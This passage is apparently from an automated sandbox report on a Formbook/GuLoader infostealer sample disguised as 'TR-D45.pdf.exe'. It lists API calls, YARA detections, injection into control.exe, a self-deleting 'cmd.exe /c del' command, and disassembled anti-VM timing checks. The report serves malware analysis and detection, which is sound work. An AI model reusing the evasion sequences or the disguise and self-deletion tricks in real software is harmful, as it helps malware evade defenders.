  • 1_2_1E2A9710 NtQueryInformationToken, LdrInitializeThunk
  • 1_2_1E2A97A0 NtUnmapViewOfSection, LdrInitializeThunk
  • 1_2_1E2A9780 NtMapViewOfSection, LdrInitializeThunk
  • 1_2_1E2A9540 NtReadFile, LdrInitializeThunk
  • 1_2_1E2A95D0 NtClose, LdrInitializeThunk
  • 1_2_1E2A9A20 NtResumeThread, LdrInitializeThunk
  • 1_2_1E2A9A00 NtProtectVirtualMemory, LdrInitializeThunk
  • 1_2_1E2A9A50 NtCreateFile, LdrInitializeThunk
  • 1_2_1E2A9860 NtQuerySystemInformation, LdrInitializeThunk
  • 1_2_1E2A9840 NtDelayExecution, LdrInitializeThunk
  • 1_2_1E2A98F0 NtReadVirtualMemory, LdrInitializeThunk
  • 1_2_1E2A9910 NtAdjustPrivilegesToken, LdrInitializeThunk
  • 1_2_1E2A99A0 NtCreateSection, LdrInitializeThunk
  • 1_2_1E2A9610 NtEnumerateValueKey
  • 1_2_1E2A9670 NtQueryInformationProcess
  • 1_2_1E2A9650 NtQueryValueKey
  • 1_2_1E2A96D0 NtCreateKey
  • 1_2_1E2A9730 NtQueryVirtualMemory
  • 1_2_1E2AA710 NtOpenProcessToken
  • 1_2_1E2A9760 NtOpenProcess
  • 1_2_1E2AA770 NtOpenThread
  • 1_2_1E2A9770 NtSetInformationFile
  • 1_2_1E2A9FE0 NtCreateMutant
  • 1_2_1E2A9520 NtWaitForSingleObject
  • 1_2_1E2AAD30 NtSetContextThread
  • 1_2_1E2A9560 NtWriteFile
  • 1_2_1E2A95F0 NtQueryInformationFile
  • 1_2_1E2A9A10 NtQuerySection
  • 1_2_1E2A9A80 NtOpenDirectoryObject
  • 1_2_1E2A9B00 NtSetValueKey
  • 1_2_1E2AA3B0 NtGetContextThread
  • 1_2_1E2A9820 NtEnumerateKey
  • 1_2_1E2AB040 NtSuspendThread
  • 1_2_1E2A98A0 NtWriteVirtualMemory
  • 1_2_1E2A9950 NtQueueApcThread
  • 1_2_1E2A99D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\control.exe, code functions in process 12_2:
  • 12_2_04479840 NtDelayExecution, LdrInitializeThunk
  • 12_2_04479860 NtQuerySystemInformation, LdrInitializeThunk
  • 12_2_04479540 NtReadFile, LdrInitializeThunk
  • 12_2_04479910 NtAdjustPrivilegesToken, LdrInitializeThunk
  • 12_2_044795D0 NtClose, LdrInitializeThunk
  • 12_2_044799A0 NtCreateSection, LdrInitializeThunk
  • 12_2_04479A50 NtCreateFile, LdrInitializeThunk
  • 12_2_04479650 NtQueryValueKey, LdrInitializeThunk
  • 12_2_04479660 NtAllocateVirtualMemory, LdrInitializeThunk
  • 12_2_044796D0 NtCreateKey, LdrInitializeThunk
  • 12_2_044796E0 NtFreeVirtualMemory, LdrInitializeThunk
  • 12_2_04479710 NtQueryInformationToken, LdrInitializeThunk
  • 12_2_04479FE0 NtCreateMutant, LdrInitializeThunk
  • 12_2_04479780 NtMapViewOfSection, LdrInitializeThunk
  • 12_2_0447B040 NtSuspendThread
  • 12_2_04479820 NtEnumerateKey
  • 12_2_044798F0 NtReadVirtualMemory
  • 12_2_044798A0 NtWriteVirtualMemory
  • 12_2_04479950 NtQueueApcThread
  • 12_2_04479560 NtWriteFile
  • 12_2_04479520 NtWaitForSingleObject
  • 12_2_0447AD30 NtSetContextThread
  • 12_2_044799D0 NtCreateProcessEx
  • 12_2_044795F0 NtQueryInformationFile
  • 12_2_04479670 NtQueryInformationProcess
  • 12_2_04479A00 NtProtectVirtualMemory
  • 12_2_04479610 NtEnumerateValueKey
  • 12_2_04479A10 NtQuerySection
  • 12_2_04479A20 NtResumeThread
  • 12_2_04479A80 NtOpenDirectoryObject
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479760 NtOpenProcess,12_2_04479760
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479770 NtSetInformationFile,12_2_04479770
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0447A770 NtOpenThread,12_2_0447A770
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479B00 NtSetValueKey,12_2_04479B00
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0447A710 NtOpenProcessToken,12_2_0447A710
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479730 NtQueryVirtualMemory,12_2_04479730
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044797A0 NtUnmapViewOfSection,12_2_044797A0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0447A3B0 NtGetContextThread,12_2_0447A3B0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02459E70 NtClose,12_2_02459E70
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02459F20 NtAllocateVirtualMemory,12_2_02459F20
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02459D40 NtCreateFile,12_2_02459D40
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02459DF0 NtReadFile,12_2_02459DF0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02459E6A NtReadFile,NtClose,12_2_02459E6A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02459E9B NtClose,12_2_02459E9B
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02459F1A NtAllocateVirtualMemory,12_2_02459F1A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02459D92 NtCreateFile,12_2_02459D92
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_00404E8F0_2_00404E8F
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_0040568E0_2_0040568E
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E286E301_2_1E286E30
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E32D6161_2_1E32D616
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E332EF71_2_1E332EF7
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E331FF11_2_1E331FF1
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E33DFCE1_2_1E33DFCE
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E27841F1_2_1E27841F
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E32D4661_2_1E32D466
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E260D201_2_1E260D20
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E332D071_2_1E332D07
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E331D551_2_1E331D55
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2925811_2_1E292581
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E27D5E01_2_1E27D5E0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E3325DD1_2_1E3325DD
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E3322AE1_2_1E3322AE
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E332B281_2_1E332B28
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29EBB01_2_1E29EBB0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E32DBD21_2_1E32DBD2
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E3203DA1_2_1E3203DA
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E33E8241_2_1E33E824
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E3210021_2_1E321002
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2920A01_2_1E2920A0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E3320A81_2_1E3320A8
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E27B0901_2_1E27B090
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E3328EC1_2_1E3328EC
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2841201_2_1E284120
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E26F9001_2_1E26F900
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_000BD3401_2_000BD340
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044FD46612_2_044FD466
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F100212_2_044F1002
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0444841F12_2_0444841F
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_045028EC12_2_045028EC
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0444B09012_2_0444B090
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044620A012_2_044620A0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_045020A812_2_045020A8
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04501D5512_2_04501D55
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0443F90012_2_0443F900
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04502D0712_2_04502D07
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04430D2012_2_04430D20
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0445412012_2_04454120
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_045025DD12_2_045025DD
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0444D5E012_2_0444D5E0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446258112_2_04462581
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04456E3012_2_04456E30
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04502EF712_2_04502EF7
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_045022AE12_2_045022AE
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04502B2812_2_04502B28
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044FDBD212_2_044FDBD2
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04501FF112_2_04501FF1
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446EBB012_2_0446EBB0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0245D34012_2_0245D340
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02449E4012_2_02449E40
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02449E3C12_2_02449E3C
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0245CF8612_2_0245CF86
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0245DF9412_2_0245DF94
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02442FB012_2_02442FB0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02442D8712_2_02442D87
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02442D9012_2_02442D90
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: String function: 1E26B150 appears 45 times
      Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0443B150 appears 35 times
      Source: TR-D45.pdf.exe, 00000000.00000002.247663244.0000000002250000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs TR-D45.pdf.exe
      Source: TR-D45.pdf.exe, 00000000.00000000.228367580.0000000000414000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSBEKASSEBILER.exe vs TR-D45.pdf.exe
      Source: TR-D45.pdf.exeBinary or memory string: OriginalFilename vs TR-D45.pdf.exe
      Source: TR-D45.pdf.exe, 00000001.00000002.320194787.000000001E4EF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TR-D45.pdf.exe
      Source: TR-D45.pdf.exe, 00000001.00000003.313426694.0000000000919000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs TR-D45.pdf.exe
      Source: TR-D45.pdf.exe, 00000001.00000000.246411137.0000000000414000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSBEKASSEBILER.exe vs TR-D45.pdf.exe
      Source: TR-D45.pdf.exe, 00000001.00000002.319716219.000000001DDB0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs TR-D45.pdf.exe
      Source: TR-D45.pdf.exe, 00000001.00000002.319651921.000000001DC60000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs TR-D45.pdf.exe
      Source: TR-D45.pdf.exeBinary or memory string: OriginalFilenameSBEKASSEBILER.exe vs TR-D45.pdf.exe
      Source: 0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000C.00000002.495347185.00000000026CA000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000C.00000002.495505278.00000000028B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000C.00000002.495505278.00000000028B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000C.00000002.497491783.000000000493F000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000001.00000002.319831190.000000001E010000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.319831190.000000001E010000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/0@8/3
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6692:120:WilError_01
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\~DF02231C1D730B1CDB.TMPJump to behavior
      Source: TR-D45.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: TR-D45.pdf.exeVirustotal: Detection: 29%
      Source: TR-D45.pdf.exeReversingLabs: Detection: 14%
      Source: unknownProcess created: C:\Users\user\Desktop\TR-D45.pdf.exe 'C:\Users\user\Desktop\TR-D45.pdf.exe'
      Source: unknownProcess created: C:\Users\user\Desktop\TR-D45.pdf.exe 'C:\Users\user\Desktop\TR-D45.pdf.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\TR-D45.pdf.exe'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeProcess created: C:\Users\user\Desktop\TR-D45.pdf.exe 'C:\Users\user\Desktop\TR-D45.pdf.exe' Jump to behavior
      Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\TR-D45.pdf.exe'Jump to behavior
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.292398447.00000000070D0000.00000002.00000001.sdmp
      Source: Binary string: control.pdb source: TR-D45.pdf.exe
      Source: Binary string: wntdll.pdbUGP source: TR-D45.pdf.exe, 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, control.exe, 0000000C.00000003.314263718.00000000040E0000.00000004.00000001.sdmp
      Source: Binary string: wntdll.pdb source: TR-D45.pdf.exe, control.exe
      Source: Binary string: control.pdbUGP source: TR-D45.pdf.exe, 00000001.00000002.314034549.00000000000D0000.00000040.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.292398447.00000000070D0000.00000002.00000001.sdmp

      Data Obfuscation:

      Yara detected GuLoader
      Source: Yara match | File source: Process Memory Space: TR-D45.pdf.exe PID: 3668, type: MEMORY
      Source: Yara match | File source: Process Memory Space: TR-D45.pdf.exe PID: 6060, type: MEMORY
      Yara detected VB6 Downloader Generic
      Source: Yara match | File source: Process Memory Space: TR-D45.pdf.exe PID: 3668, type: MEMORY
      Source: Yara match | File source: Process Memory Space: TR-D45.pdf.exe PID: 6060, type: MEMORY
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_004114BC push eax; ret 0_2_004114FB
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02395BD8 push ss; iretd 0_2_02395BE5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_0239497F push ss; iretd 0_2_02395BE5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02394954 push ss; iretd 0_2_02395BE5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_023949AB push ss; iretd 0_2_02395BE5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_023949DF push ss; iretd 0_2_02395BE5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_3_0091C611 push ecx; ret 1_3_0091C624
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_3_00930BDE push ebx; iretd 1_3_00930C81
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2BD0D1 push ecx; ret 1_2_1E2BD0E4
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_000B7811 push cs; retf 1_2_000B7819
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_000BDA6C push edi; ret 1_2_000BDA6E
      Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_0448D0D1 push ecx; ret 12_2_0448D0E4
      Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_0245DA6C push edi; ret 12_2_0245DA6E
      Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_024563C0 pushad ; retf 12_2_02456460
      Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_02457811 push cs; retf 12_2_02457819
      Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_0245CEE2 push eax; ret 12_2_0245CEE8
      Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_0245CEEB push eax; ret 12_2_0245CF52
      Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_0245CE95 push eax; ret 12_2_0245CEE8
      Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_0245CF4C push eax; ret 12_2_0245CF52
      Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_02456437 pushad ; retf 12_2_02456460
      Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_0245E4B2 push cs; retf 12_2_0245E4B3

      Hooking and other Techniques for Hiding and Protection:

      Modifies the prolog of user mode functions (user mode inline hooks)
      Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xEB
      Uses an obfuscated file name to hide its real file extension (double extension)
      Source: Possible double extension: pdf.exe | Static PE information: TR-D45.pdf.exe
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\control.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      Contains functionality to detect hardware virtualization (CPUID execution measurement)
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02390A92 NtSetInformationThread, TerminateProcess, 0_2_02390A92
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02390BAE TerminateProcess, 0_2_02390BAE
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02390AC7 TerminateProcess, 0_2_02390AC7
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02390B37 TerminateProcess, 0_2_02390B37
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02390B9C TerminateProcess, 0_2_02390B9C
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02390B83 TerminateProcess, 0_2_02390B83
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02390BD3 TerminateProcess, 0_2_02390BD3
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02390C27 TerminateProcess, 0_2_02390C27
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02390C67 TerminateProcess, 0_2_02390C67
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | RDTSC instruction interceptor: First address: 00000000023980C6 second address: 00000000023980C6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FF010BA7BE8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f fnop 0x00000021 add edi, edx 0x00000023 dec dword ptr [ebp+000000F8h] 0x00000029 jmp 00007FF010BA7C0Eh 0x0000002b cmp ecx, BDD4905Dh 0x00000031 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000038 jne 00007FF010BA7B93h 0x0000003a cmp bx, bx 0x0000003d call 00007FF010BA7C42h 0x00000042 call 00007FF010BA7BFAh 0x00000047 lfence 0x0000004a mov edx, dword ptr [7FFE0014h] 0x00000050 lfence 0x00000053 ret 0x00000054 mov esi, edx 0x00000056 pushad 0x00000057 rdtsc
      Tries to detect Any.run
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | File opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | File opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: TR-D45.pdf.exe | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | RDTSC instruction interceptor: First address: 00000000023980C6 second address: 00000000023980C6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FF010BA7BE8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f fnop 0x00000021 add edi, edx 0x00000023 dec dword ptr [ebp+000000F8h] 0x00000029 jmp 00007FF010BA7C0Eh 0x0000002b cmp ecx, BDD4905Dh 0x00000031 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000038 jne 00007FF010BA7B93h 0x0000003a cmp bx, bx 0x0000003d call 00007FF010BA7C42h 0x00000042 call 00007FF010BA7BFAh 0x00000047 lfence 0x0000004a mov edx, dword ptr [7FFE0014h] 0x00000050 lfence 0x00000053 ret 0x00000054 mov esi, edx 0x00000056 pushad 0x00000057 rdtsc
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | RDTSC instruction interceptor: First address: 00000000023980E8 second address: 00000000023980E8 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FF010BA1252h 0x0000001f popad 0x00000020 call 00007FF010BA0BCFh 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | RDTSC instruction interceptor: First address: 0000000002390F1B second address: 0000000002399812 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push dword ptr [ebp+0000009Ch] 0x00000009 cmp bh, bh 0x0000000b push eax 0x0000000c jmp 00007FF010BA7C0Eh 0x0000000e cmp dh, ah 0x00000010 call 00007FF010BB03E8h 0x00000015 jmp 00007FF010BA7C12h 0x00000017 cmp ax, cx 0x0000001a call 00007FF010BA7BE5h 0x0000001f pop ebx 0x00000020 sub ebx, 05h 0x00000023 inc ebx 0x00000024 dec ebx 0x00000025 xor edx, edx 0x00000027 mov eax, ebx 0x00000029 mov ecx, 00000004h 0x0000002e div ecx 0x00000030 jmp 00007FF010BA7C0Eh 0x00000032 cmp dh, ah 0x00000034 cmp edx, 00000000h 0x00000037 jne 00007FF010BA7BA1h 0x00000039 movd mm3, ebx 0x0000003c jmp 00007FF010BA7C0Ah 0x0000003e pushad 0x0000003f mov edx, 00000023h 0x00000044 rdtsc
